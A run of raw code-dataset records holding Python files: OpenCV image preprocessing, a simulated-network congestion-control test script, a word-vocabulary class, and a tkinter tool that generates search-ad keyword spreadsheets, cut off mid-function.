imgHue, imgSaturation, imgValue = cv2.split(imgHSV)\n\n return imgValue\n\n###################################################################################################\ndef maximizeContrast(imgGrayscale):\n\n height, width = imgGrayscale.shape\n\n imgTopHat = np.zeros((height, width, 1), np.uint8)\n imgBlackHat = np.zeros((height, width, 1), np.uint8)\n\n structuringElement = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3)) # Same as np.ones((3,3)\n\n imgTopHat = cv2.morphologyEx(imgGrayscale, cv2.MORPH_TOPHAT, structuringElement) # It is difference of input image and Opening of the image\n imgBlackHat = cv2.morphologyEx(imgGrayscale, cv2.MORPH_BLACKHAT, structuringElement) # it is difference of closing of the input image and input image.\n\n imgGrayscalePlusTopHat = cv2.add(imgGrayscale, imgTopHat)\n imgGrayscalePlusTopHatMinusBlackHat = cv2.subtract(imgGrayscalePlusTopHat, imgBlackHat)\n\n return imgGrayscalePlusTopHatMinusBlackHat\n","sub_path":"Main Program/Preprocess.py","file_name":"Preprocess.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"16912974","text":"# Copyright 2019 Nathan Jay and Noga Rotman\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport random\n\nimport gym\nimport os\nimport sys\nimport inspect\nfrom tqdm import tqdm\nimport numpy as np\n\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\npparentdir = os.path.dirname(parentdir)\nsys.path.insert(0,pparentdir)\n\nfrom src.gym.simulate_network.link import Link\nfrom src.gym.simulate_network.network import Network\nfrom src.gym.simulate_network.sender import Sender\n\nfrom src.gym.simulate_network.simulated_network_env import SimulatedNetworkEnv\nfrom src.gym.no_regret_policy.gradient_calculating_agent import GradientCalculatingAgent\n\nimport src.gym.simulate_network.single_sender_network\nfrom src.common.simple_arg_parse import arg_or_default\nfrom src.gym.no_regret_policy.no_regret_policy import NoRegretAgent\nfrom src.gym.aurora_policy.aurora_policy import AuroraPolicy\nfrom src.gym.no_regret_policy.no_regret_combining_policy import NoRegretCombiningPolicy\n\nhistory_len = 10\nfeatures = \"sent latency inflation,\" + \"latency ratio,\" + \"send ratio\"\n\nbws = [100, 240] # [200, 300, 200, 300]\nindex = 0\n\ndef get_network():\n global index\n\n while True:\n link1 = Link.generate_link(bws[index], 0.2, 6, 0)\n links = [link1]\n\n yield links\n index = 1 - index\n\nsenders = [\n Sender(\n random.uniform(0.3, 1.5) * bws[0],\n None, 0, features.split(\",\"),\n history_len=history_len\n )\n]\n\nimport matplotlib.pyplot as plt\n\nenv = SimulatedNetworkEnv(senders, get_network(), history_len=history_len, features=features)\nmodel = NoRegretCombiningPolicy(\n AuroraPolicy(\"./rand_model_12\", env),\n NoRegretAgent(GradientCalculatingAgent(actions_limits=(40, 300), C=11 * 300, L=2))\n)\n\n#time_data = [float(event[\"Time\"]) for event in data[\"Events\"][1:]]\n#rew_data = [float(event[\"Reward\"]) for event in data[\"Events\"][1:]]\n#optimal_data = [float(event[\"Optimal\"]) for event in data[\"Optimal\"][1:]]\n#send_data = [float(event[\"Send Rate\"]) for event in data[\"Events\"][1:]]\n\n\nTIMES = 10000\n\npbar = tqdm(total=TIMES / 100)\n\nobs = env.reset()\nrewards = [0, 0]\nfor i in range(TIMES):\n #env.senders[0].set_rate(40)\n action = model.predict(obs[0], rewards[0])\n env.senders[0].set_rate(action)\n\n #action = model2.predict(obs[0], rewards[0])\n #env.senders[1].set_rate(action)\n #env.senders[0].set_rate(int(250-i/2000*250))\n #env.senders[0].set_rate(i / 5000 * 220)\n #env.senders[0].set_rate(210)\n # print(\"Sending rate %d Reward %f\" % (env.senders[0].rate, rewards[0]))\n obs, rewards, dones, info = env.step([0])\n\n # if i > 0 and i % 400 == 0:\n # event = info[0][\"Events\"][-1]\n # obs = env.reset()\n # times = [event[\"Time\"] for event in info[0][\"Events\"][-501:]]\n # send = [event[\"Send Rate\"] for event in info[0][\"Events\"][-500:]]\n # throu = [event[\"Throughput\"] for event in info[0][\"Events\"][-500:]]\n # optim = [8*event[\"Optimal\"] for event in info[0][\"Events\"][-501:]]\n # plt.plot(times[:500], throu, \"g.\", label=\"Throughput\")\n # plt.plot(times[:500], send, \"r.\", label=\"Send rate\")\n # plt.plot(times, optim, \"b--\", label=\"Optimal\")\n # plt.draw()\n # plt.pause(0.01)\n #\n # for sender in env.senders:\n # sender.reset_events()\n\n #if i > 0 and i % 5500 == 0:\n # model.faster_learning_rate()\n\n if i > 0 and i % 2000 == 0:\n obs = env.reset(True)\n\n\n env.render()\n\n if i % 100 == 0:\n pbar.update(1)\n\n\nfig, ax = plt.subplots(nrows=3, ncols=2)\n\ntimes = [event[\"Time\"] for event in info[0][\"Events\"]]\nsend = [event[\"Send Rate\"] for event in info[0][\"Events\"]]\nthrou = [event[\"Throughput\"] for event in info[0][\"Events\"]]\noptim = [8*event[\"Optimal\"] for event in info[0][\"Events\"]]\nlatency = [event[\"Latency Gradient\"] for event in info[0][\"Events\"]]\nlat = [event[\"Latency\"] for event in info[0][\"Events\"]]\nloss = [event[\"Loss Rate\"] for event in info[0][\"Events\"]]\nreward = [event[\"Reward\"] for event in info[0][\"Events\"]]\nax[0][0].title.set_text(\"Sending rate\")\nax[0][0].plot(times, throu, \"g.\", label=\"Throughput\")\nax[0][0].plot(times, send, \"r-\", label=\"Send rate\")\nax[0][0].plot(times, optim, \"b--\", label=\"Optimal\")\nax[0][0].legend()\nax[0][0].grid()\n\nax[0][1].title.set_text(\"Latency Gradient\")\nax[0][1].plot(times, latency, \"r.\", label=\"Latency Gradient\")\nax[0][1].legend()\nax[0][1].grid()\n\nax[1][0].title.set_text(\"Reward\")\nax[1][0].plot(times, reward, \"b.\", label=\"Reward\")\nax[1][0].legend()\nax[1][0].grid()\n\nax[1][1].title.set_text(\"Loss\")\nax[1][1].plot(times, loss, \"g.\", label=\"Loss\")\nax[1][1].legend()\nax[1][1].grid()\n\nax[2][0].title.set_text(\"Latency\")\nax[2][0].plot(times, lat, \"b.\", label=\"Latency\")\nax[2][0].plot(times, np.ones(len(times)) * env.net.links[0].delay, \"r--\", label=\"Link latency\")\nax[2][0].legend()\nax[2][0].grid()\n\nplt.show()\n","sub_path":"src/gym/test_comb.py","file_name":"test_comb.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512398027","text":"import re\n\n\n\nclass vocabulary(object):\n\n def __init__(self,w = 3):\n self.window = w\n self.vindex = 0\n self.vlook = []\n self.vocab = []\n\n self.aword = re.compile(r'(\\b(\\w|\\.)+\\b)|!|\\?|\\.+',re.LOCALE)\n self.apunc = re.compile(r'!|\\?|\\.+',re.LOCALE)\n self.documents = []\n\n def numword(self,n):\n if n == -1:return ''\n return self.vlook[n]\n\n def wordnum(self,w):\n for x in range(self.vindex):\n if self.vlook[x] == w:\n return self.vocab[x]\n self.vlook.append(w)\n self.vocab.append(self.vindex)\n self.vindex += 1\n return self.vindex-1\n\n # return a list of context windows around each of a sequence of words\n def contextwindow(self,words):\n assert (self.window % 2) == 1\n assert self.window >= 1\n wordspadded = self.window//2*[-1] + words + self.window//2*[-1]\n out = [wordspadded[i:i+self.window] for i in range(len(words))]\n assert len(out) == len(words)\n return out\n\n # cache a text document for later processing\n def consume_document(self,doc):\n words = self.aword.finditer(doc)\n numwords = [self.wordnum(w.group(0)) for w in words]\n #allwords = [self.numword(n) for n in numwords]\n numwordcontexts = self.contextwindow(numwords)\n self.documents.append(numwordcontexts)\n return numwordcontexts\n\n\n\n","sub_path":"src/nnets/aiobrain/language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"182464870","text":"import tkinter as tk\r\nfrom tkinter import IntVar\r\nfrom openpyxl import Workbook\r\n\r\nroot= tk.Tk()\r\n\r\ncanvas1 = tk.Canvas(root, width = 1800, height = 800)\r\ncanvas1.pack()\r\n\r\n\r\n\r\n\r\n\r\n\r\nkeywords = tk.Entry (root) \r\nbranded_words = tk.Entry (root) \r\n#brand\r\ntactic_type = tk.Entry (root)\r\ntier = tk.Entry (root)\r\ncorp_non = tk.Entry (root)\r\nlob = tk.Entry (root)\r\nintiative = tk.Entry (root)\r\n#match_type\r\nregion = tk.Entry (root)\r\nmarket = tk.Entry (root)\r\nsub_region = tk.Entry (root)\r\nlanguage = tk.Entry (root)\r\ndevice = tk.Entry (root)\r\n\r\ntopic = tk.Entry(root)\r\n\r\nurl_google = tk.Entry (root)\r\nurl_bing = tk.Entry (root)\r\n\r\nurl_g_aw = tk.Entry (root)\r\nurl_g_it = tk.Entry (root)\r\nurl_g_co = tk.Entry (root)\r\nurl_g_ev = tk.Entry (root)\r\n\r\nurl_b_aw = tk.Entry (root)\r\nurl_b_it = tk.Entry (root)\r\nurl_b_co = tk.Entry (root)\r\nurl_b_ev = tk.Entry (root)\r\n\r\n#cj_stages\r\n\r\ncanvas1.create_window(100, 140, window=keywords)\r\ncanvas1.create_window(350, 140, window=branded_words)\r\ncanvas1.create_window(250, 240, window=tactic_type)\r\ncanvas1.create_window(400, 240, window=tier)\r\ncanvas1.create_window(550, 240, window=corp_non)\r\ncanvas1.create_window(700, 240, window=lob)\r\ncanvas1.create_window(850, 240, window=intiative)\r\ncanvas1.create_window(1000, 240, window=region)\r\ncanvas1.create_window(1150, 240, window=market)\r\ncanvas1.create_window(1300, 240, window=sub_region)\r\ncanvas1.create_window(1450, 240, window=language)\r\ncanvas1.create_window(1600, 240, window=device)\r\ncanvas1.create_window(600, 140, window=topic)\r\ncanvas1.create_window(100, 340, window=url_google)\r\ncanvas1.create_window(250, 340, window=url_bing)\r\n\r\ncanvas1.create_window(700, 440, window=url_g_aw)\r\ncanvas1.create_window(850, 440, window=url_b_aw)\r\ncanvas1.create_window(700, 540, window=url_g_it)\r\ncanvas1.create_window(850, 540, window=url_b_it)\r\ncanvas1.create_window(700, 640, window=url_g_co)\r\ncanvas1.create_window(850, 640, window=url_b_co)\r\ncanvas1.create_window(700, 740, window=url_g_ev)\r\ncanvas1.create_window(850, 740, window=url_b_ev)\r\n\r\n\r\nkeyword_label = tk.Label(root, text='Keywords with \"/\" delimintor')\r\nbranded_words_label = tk.Label(root, text='Branded Words with \"/\" delimintor')\r\ntactic_type_label = tk.Label(root, text='AW/DG')\r\ntier_label = tk.Label(root, text='Tier')\r\ncorp_non_label = tk.Label(root, text='Corp/Non-Corp')\r\nlob_label = tk.Label(root, text='L.O.B')\r\nintiative_label = tk.Label(root, text='Intitative')\r\nregion_label = tk.Label(root, text='Region')\r\nmarket_label = tk.Label(root, text='Market')\r\nsub_region_label = tk.Label(root, text='Sub Region')\r\nlanguage_label = tk.Label(root, text='Language')\r\ndevice_label = tk.Label(root, text='Device')\r\ntopic_label = tk.Label(root, text='Topic')\r\nurl_google_label = tk.Label(root, text='URL Google')\r\nurl_bing_label = tk.Label(root, text='URL Bing')\r\n\r\ncj_url_labels = tk.Label(root, text='URLS for CJ stage')\r\ngoogle_label = tk.Label(root, text='Google')\r\nbing_label = tk.Label(root, text='Bing')\r\naw_label = tk.Label(root, text='AW')\r\nit_label = tk.Label(root, text='IT')\r\nco_label = tk.Label(root, text='CO')\r\nev_label = tk.Label(root, text='EV')\r\n\r\n\r\n\r\n\r\ncanvas1.create_window(100, 100, window=keyword_label)\r\ncanvas1.create_window(350, 100, window=branded_words_label)\r\ncanvas1.create_window(600, 100, window=topic_label)\r\ncanvas1.create_window(250, 200, window=tactic_type_label)\r\ncanvas1.create_window(400, 200, window=tier_label)\r\ncanvas1.create_window(550, 200, window=corp_non_label)\r\ncanvas1.create_window(700, 200, window=lob_label)\r\ncanvas1.create_window(850, 200, window=intiative_label)\r\ncanvas1.create_window(1000, 200, window=region_label)\r\ncanvas1.create_window(1150, 200, window=market_label)\r\ncanvas1.create_window(1300, 200, window=sub_region_label)\r\ncanvas1.create_window(1450, 200, window=language_label)\r\ncanvas1.create_window(1600, 200, window=device_label)\r\ncanvas1.create_window(100, 300, window=url_google_label)\r\ncanvas1.create_window(220, 300, window=url_bing_label)\r\n\r\ncanvas1.create_window(770, 380, window=cj_url_labels)\r\ncanvas1.create_window(700, 410, window=google_label)\r\ncanvas1.create_window(840, 410, window=bing_label)\r\n\r\ncanvas1.create_window(600, 440, window=aw_label)\r\ncanvas1.create_window(600, 540, window=it_label)\r\ncanvas1.create_window(600, 640, window=co_label)\r\ncanvas1.create_window(600, 740, window=ev_label)\r\n\r\nv = IntVar()\r\nv.set(1)\r\n\r\ntk.Radiobutton(root, text=\"Consumer Journey\", variable=v, value=1).pack(anchor='w')\r\ntk.Radiobutton(root, text=\"Consumer Journey - No Stage\", variable=v, value=2).pack(anchor='w')\r\ntk.Radiobutton(root, text=\"Audiance Pilot\", variable=v, value=3).pack(anchor='w')\r\n\r\n\r\ndef getInfo (): \r\n build_keyword = keywords.get()\r\n build_branded_words = branded_words.get()\r\n build_keyword_split = build_keyword.split('/')\r\n build_branded_words_split = build_branded_words.split('/')\r\n\r\n build_tactic_type = tactic_type.get().upper()\r\n build_tier= 'T' + tier.get()\r\n build_corp_non = corp_non.get()\r\n build_lob = lob.get()\r\n build_initative = intiative.get()\r\n build_region = region.get().upper()\r\n build_market = market.get().upper()\r\n build_sub_region = market.get()\r\n build_language = language.get().upper()\r\n build_device = device.get()\r\n build_topic = topic.get()\r\n build_url_google = url_google.get()\r\n build_url_bing = url_bing.get()\r\n \r\n return build_keyword_split, build_branded_words_split, build_tactic_type, build_tier, build_corp_non, build_lob, build_initative, build_region, build_market, build_sub_region, build_language, build_device, build_topic, build_url_google, build_url_bing\r\n \r\ndef get_cj_URLS():\r\n aw_url_g = url_g_aw.get()\r\n aw_url_b = url_b_aw.get()\r\n it_url_g = url_g_it.get()\r\n it_url_b = url_b_it.get()\r\n co_url_g = url_g_co.get()\r\n co_url_b = url_b_co.get()\r\n ev_url_g = url_g_ev.get()\r\n ev_url_b = url_b_ev.get()\r\n \r\n return aw_url_g, aw_url_b, it_url_g, it_url_b, co_url_g, co_url_b, ev_url_g, ev_url_b\r\n\r\n\r\ndef taxonomyBuild():\r\n info = getInfo()\r\n radio = v.get()\r\n br = 'BR_'\r\n ub = 'UB_'\r\n broad = '_Broad_'\r\n exact = '_Exact_'\r\n campaign_br_broad = br +'_'.join(info[2:6]) + broad + '_'.join(info[7:-3])\r\n campaign_br_exact = br +'_'.join(info[2:6]) + exact + '_'.join(info[7:-3])\r\n campaign_ub_broad = ub +'_'.join(info[2:6]) + broad + '_'.join(info[7:-3])\r\n campaign_ub_exact = ub +'_'.join(info[2:6]) + exact + '_'.join(info[7:-3])\r\n if radio == 3:\r\n hiq = '_HIQ_'\r\n miq = '_MIQ_'\r\n unk = '_UNK_'\r\n adgroup_br_broad_HIQ = br + '_' + str(info[5]) + '_' + str(info[2]) + hiq + broad + str(info[7]) + '_' + str(info[10])\r\n adgroup_br_broad_MIQ = br + '_' + str(info[5]) + '_' + str(info[2]) + miq + broad + str(info[7]) + '_' + str(info[10])\r\n adgroup_br_broad_UNK = br + '_' + str(info[5]) + '_' + str(info[2]) + unk + broad + str(info[7]) + '_' + str(info[10])\r\n\r\n adgroup_br_exact_HIQ = br + '_' + str(info[5]) + '_' + str(info[2]) + hiq + exact + str(info[7]) + '_' + str(info[10])\r\n adgroup_br_exact_MIQ = br + '_' + str(info[5]) + '_' + str(info[2]) + miq + exact + str(info[7]) + '_' + str(info[10])\r\n adgroup_br_exact_UNK = br + '_' + str(info[5]) + '_' + str(info[2]) + unk + exact + str(info[7]) + '_' + str(info[10])\r\n\r\n adgroup_ub_broad_HIQ = ub + '_' + str(info[5]) + '_' + str(info[2]) + hiq + broad + str(info[7]) + '_' + str(info[10])\r\n adgroup_ub_broad_MIQ = ub + '_' + str(info[5]) + '_' + str(info[2]) + miq + broad + str(info[7]) + '_' + str(info[10])\r\n adgroup_ub_broad_UNK = ub + '_' + str(info[5]) + '_' + str(info[2]) + unk + broad + str(info[7]) + '_' + str(info[10])\r\n\r\n adgroup_ub_exact_HIQ = ub + '_' + str(info[5]) + '_' + str(info[2]) + hiq + exact + str(info[7]) + '_' + str(info[10])\r\n adgroup_ub_exact_MIQ = ub + '_' + str(info[5]) + '_' + str(info[2]) + miq + exact + str(info[7]) + '_' + str(info[10])\r\n adgroup_ub_exact_UNK = ub + '_' + str(info[5]) + '_' + str(info[2]) + unk + exact + str(info[7]) + '_' + str(info[10])\r\n\r\n return campaign_br_broad, campaign_br_exact, campaign_ub_broad, campaign_ub_exact, adgroup_br_broad_HIQ, adgroup_br_broad_MIQ, adgroup_br_broad_UNK, adgroup_br_exact_HIQ, adgroup_br_exact_MIQ, adgroup_br_exact_UNK, adgroup_ub_broad_HIQ,adgroup_ub_broad_MIQ, adgroup_ub_broad_UNK, adgroup_ub_exact_HIQ,adgroup_ub_exact_MIQ, adgroup_ub_exact_UNK\r\n elif radio == 1:\r\n aw = '_AW'\r\n it = '_IT'\r\n co = '_CO'\r\n ev = '_EV'\r\n adgroup_br_broad_AW = br + str(info[6]) + '_' + str(info[-3]) +aw +broad + str(info[-5])\r\n adgroup_br_broad_IT = br + str(info[6]) + '_' + str(info[-3]) +it +broad + str(info[-5])\r\n adgroup_br_broad_CO = br + str(info[6]) + '_' + str(info[-3]) +co +broad + str(info[-5])\r\n adgroup_br_broad_EV = br + str(info[6]) + '_' + str(info[-3]) +ev +broad + str(info[-5])\r\n\r\n adgroup_br_exact_AW = br + str(info[6]) + '_' + str(info[-3]) +aw +exact + str(info[-5])\r\n adgroup_br_exact_IT = br + str(info[6]) + '_' + str(info[-3]) +it +exact + str(info[-5])\r\n adgroup_br_exact_CO = br + str(info[6]) + '_' + str(info[-3]) +co +exact + str(info[-5])\r\n adgroup_br_exact_EV = br + str(info[6]) + '_' + str(info[-3]) +ev +exact + str(info[-5])\r\n\r\n adgroup_ub_broad_AW = ub + str(info[6]) + '_' + str(info[-3]) +aw +broad + str(info[-5])\r\n adgroup_ub_broad_IT = ub + str(info[6]) + '_' + str(info[-3]) +it +broad + str(info[-5])\r\n adgroup_ub_broad_CO = ub + str(info[6]) + '_' + str(info[-3]) +co +broad + str(info[-5])\r\n adgroup_ub_broad_EV = ub + str(info[6]) + '_' + str(info[-3]) +ev +broad + str(info[-5])\r\n\r\n adgroup_ub_exact_AW = ub + str(info[6]) + '_' + str(info[-3]) +aw +exact + str(info[-5])\r\n adgroup_ub_exact_IT = ub + str(info[6]) + '_' + str(info[-3]) +it +exact + str(info[-5])\r\n adgroup_ub_exact_CO = ub + str(info[6]) + '_' + str(info[-3]) +co +exact + str(info[-5])\r\n adgroup_ub_exact_EV = ub + str(info[6]) + '_' + str(info[-3]) +ev +exact + str(info[-5])\r\n\r\n return campaign_br_broad, campaign_br_exact, campaign_ub_broad, campaign_ub_exact, adgroup_br_broad_AW, adgroup_br_broad_AW, adgroup_br_broad_IT, adgroup_br_broad_CO, adgroup_br_broad_EV, adgroup_br_exact_AW, adgroup_br_exact_IT, adgroup_br_exact_CO, adgroup_br_exact_EV, adgroup_ub_broad_AW, adgroup_ub_broad_IT, adgroup_ub_broad_CO, adgroup_ub_broad_EV, adgroup_ub_exact_AW, adgroup_ub_exact_IT, adgroup_ub_exact_CO, adgroup_ub_exact_EV\r\n\r\n\r\n else:\r\n adgroup_br_broad = br + str(info[6]) + '_' + str(info[-3]) +broad + str(info[-5])\r\n adgroup_br_exact = br + str(info[6]) + '_' + str(info[-3]) +exact + str(info[-5])\r\n adgroup_ub_broad = ub + str(info[6]) + '_' + str(info[-3]) +broad + str(info[-5])\r\n adgroup_ub_exact = ub + str(info[6]) + '_' + str(info[-3]) +exact + str(info[-5])\r\n\r\n return campaign_br_broad, campaign_br_exact, campaign_ub_broad, campaign_ub_exact, adgroup_br_broad, adgroup_br_exact, adgroup_ub_broad, adgroup_ub_exact\r\n\r\ndef createBuild():\r\n taxonomy = taxonomyBuild()\r\n info = getInfo()\r\n urls = get_cj_URLS()\r\n\r\n wb = Workbook()\r\n ws = wb.active\r\n radio = v.get()\r\n if radio == 1:\r\n #root words\r\n pre_rootword_what ='What'\r\n pre_rootword_how ='How'\r\n pre_rootword_explain ='Explain'\r\n pre_rootword_best ='Best'\r\n pre_rootword_top ='Top'\r\n pre_rootword_compare ='Compare'\r\n pre_rootword_try ='Try'\r\n post_rootword_explained ='Explained'\r\n post_rootword_examples ='Examples'\r\n post_rootword_sources ='Sources'\r\n post_rootword_versus ='Versus'\r\n post_rootword_review ='Review'\r\n post_rootword_trial ='Trial'\r\n post_rootword_demo ='Demo'\r\n\r\n #create list permiations from rootwords and user generated keywords\r\n #Awareness\r\n Awareness_perm_what = [pre_rootword_what + ' ' + x for x in info[0]]\r\n Awareness_perm_how = [pre_rootword_how + ' ' + x for x in info[0]]\r\n Awareness_perm_explain = [pre_rootword_explain + ' ' + x for x in info[0]]\r\n Awareness_perm_explained = [x + ' ' + post_rootword_explained for x in info[0]]\r\n #Interest\r\n Interest_perm_best = [pre_rootword_best + ' ' + x for x in info[0]]\r\n Interest_perm_top = [pre_rootword_top + ' ' + x for x in info[0]]\r\n Interest_perm_examples = [x + ' ' + post_rootword_examples for x in info[0]]\r\n Interest_perm_sources = [x + ' ' + post_rootword_sources for x in info[0]]\r\n #Consideration\r\n Consideration_perm_compare = [pre_rootword_compare + ' ' + x for x in info[0]]\r\n Consideration_perm_versus = [x + ' ' + post_rootword_versus for x in info[0]]\r\n Consideration_perm_review = [x + ' ' + post_rootword_review for x in info[0]]\r\n #Evaluation\r\n Evaluation_perm_try = [pre_rootword_try + ' ' + x for x in info[0]]\r\n Evaluation_perm_trial = [x + ' ' + post_rootword_trial for x in info[0]]\r\n Evaluation_perm_demo = [x + ' ' + post_rootword_demo for x in info[0]]\r\n\r\n #Grouping by Stage\r\n Awareness = Awareness_perm_what + Awareness_perm_how + Awareness_perm_explain + Awareness_perm_explained\r\n Interest = Interest_perm_best + Interest_perm_top + Interest_perm_examples + Interest_perm_sources\r\n Consideration = Consideration_perm_compare + Consideration_perm_versus + Consideration_perm_review\r\n Evaluation = Evaluation_perm_try + Evaluation_perm_trial + Evaluation_perm_demo\r\n\r\n #creates broad match keywords\r\n Awareness_broad_1 = [\"+\" + suit for suit in Awareness]\r\n Awareness_broad_2 = [x.replace(' ',' +') for x in Awareness_broad_1]\r\n Awareness = Awareness + Awareness_broad_2\r\n Interest_broad_1= [\"+\" + suit for suit in Interest]\r\n Interest_broad_2 = [x.replace(' ',' +') for x in Interest_broad_1]\r\n Interest = Interest + Interest_broad_2\r\n Consideration_broad_1 = [\"+\" + suit for suit in Consideration]\r\n Consideration_broad_2 = [x.replace(' ', ' +') for x in Consideration_broad_1]\r\n Consideration = Consideration + Consideration_broad_2\r\n Evaluation_broad_1 = [\"+\" + suit for suit in Evaluation]\r\n Evaluation_broad_2 = [x.replace(' ', ' +') for x in Evaluation_broad_1]\r\n Evaluation = Evaluation + Evaluation_broad_2\r\n consumer_journey_stages =[Awareness,Interest, Consideration, Evaluation]\r\n \r\n\r\n #create worksheets\r\n \r\n ws1 = ws.title = \"Awareness\"\r\n ws2 = wb.create_sheet(\"Interest\",1)\r\n ws3 = wb.create_sheet(\"Consideration\",2)\r\n ws4 = wb.create_sheet(\"Evaluation\",3)\r\n def column_title(worksheet_name):\r\n for ws in wb:\r\n ws['A1'] = 'Campaign'\r\n ws['B1'] = 'Ad Group'\r\n ws['C1'] = 'Keyword'\r\n ws['D1'] = 'Match Type'\r\n ws['E1'] = 'Max CPC'\r\n ws['F1'] = 'Final URL Google'\r\n ws['G1'] = 'Final URL Bing'\r\n ws['H1'] = 'BN/UB'\r\n\r\n #name each column\r\n column_title(wb[\"Awareness\"])\r\n column_title(wb[\"Interest\"])\r\n column_title(wb[\"Consideration\"])\r\n column_title(wb[\"Evaluation\"])\r\n\r\n #keyword fill function\r\n def kfill(worksheet_name, journey_stage):\r\n ws = worksheet_name \r\n r=2\r\n for word in journey_stage:\r\n ws.cell(row=r, column=3).value = word\r\n r+=1\r\n\r\n \r\n #fill keyword sett to column\r\n kfill(wb[\"Awareness\"], Awareness)\r\n kfill(wb[\"Interest\"], Interest)\r\n kfill(wb[\"Consideration\"], Consideration)\r\n kfill(wb[\"Evaluation\"], Evaluation)\r\n\r\n #match type/Max CPC/BN/UB fill function\r\n def mfill(worksheet_name):\r\n ws = worksheet_name\r\n r = 2 \r\n #iterates through rows and adds formula\r\n #Match Type\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if '+' in ws.cell(row=r, column=3).value:\r\n ws.cell(row=r, column=4).value = 'Broad'\r\n else:\r\n ws.cell(row=r, column=4).value = 'Exact'\r\n if ws.cell(row=r, column=4).value =='Broad':\r\n ws.cell(row=r, column=5).value = 10\r\n else:\r\n ws.cell(row=r, column=5).value = 12\r\n if any(word in ws.cell(row=r, column=3).value for word in info[1]):\r\n ws.cell(row=r, column=8).value = 'BN'\r\n else:\r\n ws.cell(row=r, column=8).value = 'UB'\r\n r += 1\r\n \r\n \r\n mfill(wb[\"Awareness\"])\r\n mfill(wb[\"Interest\"])\r\n mfill(wb[\"Consideration\"])\r\n mfill(wb[\"Evaluation\"])\r\n\r\n #URL fill function\r\n def ufill(worksheet_name,url_asset_G,url_asset_B):\r\n ws = worksheet_name\r\n r = 2\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n ws.cell(row=r, column=6).value = str(url_asset_G)\r\n ws.cell(row=r, column=7).value = str(url_asset_B)\r\n r += 1\r\n \r\n ufill(wb[\"Awareness\"],urls[0], urls[1])\r\n ufill(wb[\"Interest\"],urls[2], urls[3])\r\n ufill(wb[\"Consideration\"],urls[4], urls[5])\r\n ufill(wb[\"Evaluation\"],urls[6],urls[7])\r\n\r\n def afill(worksheet_name):\r\n r = 2\r\n ws = worksheet_name\r\n if ws == wb[\"Awareness\"]:\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[4]\r\n elif ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'UB':\r\n ws.cell(row=r, column=2).value = taxonomy[5]\r\n elif ws.cell(row=r, column=4).value == 'Exact' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[6]\r\n else:\r\n ws.cell(row=r, column=2).value = taxonomy[7]\r\n if ws == wb[\"Interest\"]:\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[8]\r\n elif ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'UB':\r\n ws.cell(row=r, column=2).value = taxonomy[9]\r\n elif ws.cell(row=r, column=4).value == 'Exact' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[10]\r\n else:\r\n ws.cell(row=r, column=2).value = taxonomy[11]\r\n if ws == wb[\"Consideration\"]:\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[12]\r\n elif ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'UB':\r\n ws.cell(row=r, column=2).value = taxonomy[13]\r\n elif ws.cell(row=r, column=4).value == 'Exact' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[14]\r\n else:\r\n ws.cell(row=r, column=2).value = taxonomy[15]\r\n if ws == wb[\"Evaluation\"]:\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[16]\r\n elif ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'UB':\r\n ws.cell(row=r, column=2).value = taxonomy[17]\r\n elif ws.cell(row=r, column=4).value == 'Exact' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=2).value = taxonomy[18]\r\n else:\r\n ws.cell(row=r, column=2).value = taxonomy[19]\r\n\r\n\r\n afill(wb[\"Awareness\"])\r\n afill(wb[\"Interest\"])\r\n afill(wb[\"Consideration\"])\r\n afill(wb[\"Evaluation\"])\r\n\r\n def cfill(worksheet_name):\r\n ws = worksheet_name\r\n r = 2\r\n for cell in ws:\r\n if ws.cell(row=r, column=3).value is not None:\r\n if ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=1).value = taxonomy[0]\r\n elif ws.cell(row=r, column=4).value == 'Broad' and ws.cell(row=r, column=8).value == 'UB':\r\n ws.cell(row=r, column=1).value = taxonomy[1]\r\n elif ws.cell(row=r, column=4).value == 'Exact' and ws.cell(row=r, column=8).value == 'BN':\r\n ws.cell(row=r, column=1).value = taxonomy[2]\r\n 